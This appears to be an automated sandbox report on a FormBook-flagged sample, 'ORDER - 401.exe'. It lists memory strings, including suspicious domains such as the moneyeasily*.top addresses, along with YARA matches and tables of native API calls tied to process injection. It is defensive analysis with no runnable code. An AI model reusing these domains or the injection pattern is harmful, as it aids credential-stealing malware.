                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005D58000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004468000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?4aeef933dc234878d84d1123ae8eab9f
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005EEA000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4679752589.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000045FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://lameo.nrkeiu.tdvgb.cn/123.html
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ieUnatt.exe, 00000008.00000003.2655937344.00000000076BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilynac.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilypao.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilysni.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kkpmoneysocial.top
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000004F36000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000003646000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: ORDER - 401.exe
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0042CCB3 NtClose,5_2_0042CCB3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052B60 NtClose,LdrInitializeThunk,5_2_01052B60
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01052DF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01052C70
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010535C0 NtCreateMutant,LdrInitializeThunk,5_2_010535C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01054340 NtSetContextThread,5_2_01054340
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01054650 NtSuspendThread,5_2_01054650
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052B80 NtQueryInformationFile,5_2_01052B80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052BA0 NtEnumerateValueKey,5_2_01052BA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052BE0 NtQueryValueKey,5_2_01052BE0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052BF0 NtAllocateVirtualMemory,5_2_01052BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052AB0 NtWaitForSingleObject,5_2_01052AB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052AD0 NtReadFile,5_2_01052AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052AF0 NtWriteFile,5_2_01052AF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052D00 NtSetInformationFile,5_2_01052D00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052D10 NtMapViewOfSection,5_2_01052D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052D30 NtUnmapViewOfSection,5_2_01052D30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052DB0 NtEnumerateKey,5_2_01052DB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052DD0 NtDelayExecution,5_2_01052DD0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052C00 NtQueryInformationProcess,5_2_01052C00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052C60 NtCreateKey,5_2_01052C60
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052CA0 NtQueryInformationToken,5_2_01052CA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052CC0 NtQueryVirtualMemory,5_2_01052CC0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052CF0 NtOpenProcess,5_2_01052CF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052F30 NtCreateSection,5_2_01052F30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052F60 NtCreateProcessEx,5_2_01052F60
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052F90 NtProtectVirtualMemory,5_2_01052F90
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052FA0 NtQuerySection,5_2_01052FA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052FB0 NtResumeThread,5_2_01052FB0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052FE0 NtCreateFile,5_2_01052FE0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052E30 NtWriteVirtualMemory,5_2_01052E30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052E80 NtReadVirtualMemory,5_2_01052E80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052EA0 NtAdjustPrivilegesToken,5_2_01052EA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01052EE0 NtQueueApcThread,5_2_01052EE0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01053010 NtOpenDirectoryObject,5_2_01053010
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01053090 NtSetValueKey,5_2_01053090
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010539B0 NtGetContextThread,5_2_010539B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01053D10 NtOpenProcessToken,5_2_01053D10
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01053D70 NtOpenThread,5_2_01053D70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04314650 NtSuspendThread,LdrInitializeThunk,8_2_04314650
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04314340 NtSetContextThread,LdrInitializeThunk,8_2_04314340
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04312C70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312C60 NtCreateKey,LdrInitializeThunk,8_2_04312C60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04312CA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04312D30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04312D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04312DF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312DD0 NtDelayExecution,LdrInitializeThunk,8_2_04312DD0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04312E80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04312EE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312F30 NtCreateSection,LdrInitializeThunk,8_2_04312F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312FB0 NtResumeThread,LdrInitializeThunk,8_2_04312FB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312FE0 NtCreateFile,LdrInitializeThunk,8_2_04312FE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312AF0 NtWriteFile,LdrInitializeThunk,8_2_04312AF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312AD0 NtReadFile,LdrInitializeThunk,8_2_04312AD0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312B60 NtClose,LdrInitializeThunk,8_2_04312B60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04312BA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04312BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04312BE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043135C0 NtCreateMutant,LdrInitializeThunk,8_2_043135C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_043139B0 NtGetContextThread,LdrInitializeThunk,8_2_043139B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312C00 NtQueryInformationProcess,8_2_04312C00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312CF0 NtOpenProcess,8_2_04312CF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312CC0 NtQueryVirtualMemory,8_2_04312CC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312D00 NtSetInformationFile,8_2_04312D00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312DB0 NtEnumerateKey,8_2_04312DB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312E30 NtWriteVirtualMemory,8_2_04312E30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312EA0 NtAdjustPrivilegesToken,8_2_04312EA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312F60 NtCreateProcessEx,8_2_04312F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312FA0 NtQuerySection,8_2_04312FA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312F90 NtProtectVirtualMemory,8_2_04312F90
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312AB0 NtWaitForSingleObject,8_2_04312AB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04312B80 NtQueryInformationFile,8_2_04312B80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04313010 NtOpenDirectoryObject,8_2_04313010
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04313090 NtSetValueKey,8_2_04313090
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04313D10 NtOpenProcessToken,8_2_04313D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04313D70 NtOpenThread,8_2_04313D70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001C9810 NtCreateFile,8_2_001C9810
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001C9970 NtReadFile,8_2_001C9970
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001C9A60 NtDeleteFile,8_2_001C9A60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001C9B00 NtClose,8_2_001C9B00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001C9C50 NtAllocateVirtualMemory,8_2_001C9C50
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_023FDE840_2_023FDE84
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B673680_2_04B67368
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B600060_2_04B60006
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B600400_2_04B60040
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_04B673580_2_04B67358
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 0_2_074E1A280_2_074E1A28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00418BF35_2_00418BF3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0042F2535_2_0042F253
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_004022E05_2_004022E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0041046B5_2_0041046B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_004104735_2_00410473
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_004025F05_2_004025F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00416DF35_2_00416DF3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00416DAC5_2_00416DAC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0040E6735_2_0040E673
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_004106935_2_00410693
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00402F255_2_00402F25
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00402F305_2_00402F30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0040E7C35_2_0040E7C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0040E7B75_2_0040E7B7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010101005_2_01010100
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BA1185_2_010BA118
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A81585_2_010A8158
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E01AA5_2_010E01AA
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D81CC5_2_010D81CC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B20005_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DA3525_2_010DA352
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E03E65_2_010E03E6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E3F05_2_0102E3F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A02C05_2_010A02C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010205355_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E05915_2_010E0591
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C44205_2_010C4420
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D24465_2_010D2446
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CE4F65_2_010CE4F6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010447505_2_01044750
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010207705_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101C7C05_2_0101C7C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103C6E05_2_0103C6E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010369625_2_01036962
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010229A05_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010EA9A65_2_010EA9A6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010228405_2_01022840
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102A8405_2_0102A840
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010068B85_2_010068B8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E8F05_2_0104E8F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DAB405_2_010DAB40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D6BD75_2_010D6BD7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA805_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD005_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BCD1F5_2_010BCD1F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01038DBF5_2_01038DBF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101ADE05_2_0101ADE0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020C005_2_01020C00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C0CB55_2_010C0CB5
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010CF25_2_01010CF2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01062F285_2_01062F28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01040F305_2_01040F30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C2F305_2_010C2F30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01094F405_2_01094F40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109EFA05_2_0109EFA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01012FC85_2_01012FC8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102CFE05_2_0102CFE0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DEE265_2_010DEE26
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020E595_2_01020E59
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01032E905_2_01032E90
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DCE935_2_010DCE93
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DEEDB5_2_010DEEDB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010EB16B5_2_010EB16B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105516C5_2_0105516C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100F1725_2_0100F172
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102B1B05_2_0102B1B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CF0CC5_2_010CF0CC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010270C05_2_010270C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D70E95_2_010D70E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DF0E05_2_010DF0E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D132D5_2_010D132D
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100D34C5_2_0100D34C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0106739A5_2_0106739A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010252A05_2_010252A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103B2C05_2_0103B2C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C12ED5_2_010C12ED
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D75715_2_010D7571
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BD5B05_2_010BD5B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DF43F5_2_010DF43F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010114605_2_01011460
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DF7B05_2_010DF7B0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D16CC5_2_010D16CC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B59105_2_010B5910
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010299505_2_01029950
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103B9505_2_0103B950
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108D8005_2_0108D800
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010238E05_2_010238E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFB765_2_010DFB76
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103FB805_2_0103FB80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01095BF05_2_01095BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105DBF95_2_0105DBF9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFA495_2_010DFA49
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D7A465_2_010D7A46
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01093A6C5_2_01093A6C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01065AA05_2_01065AA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BDAAC5_2_010BDAAC
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C1AA35_2_010C1AA3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CDAC65_2_010CDAC6
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01023D405_2_01023D40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D1D5A5_2_010D1D5A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D7D735_2_010D7D73
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103FDC05_2_0103FDC0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01099C325_2_01099C32
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFCF25_2_010DFCF2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFF095_2_010DFF09
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01021F925_2_01021F92
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DFFB15_2_010DFFB1
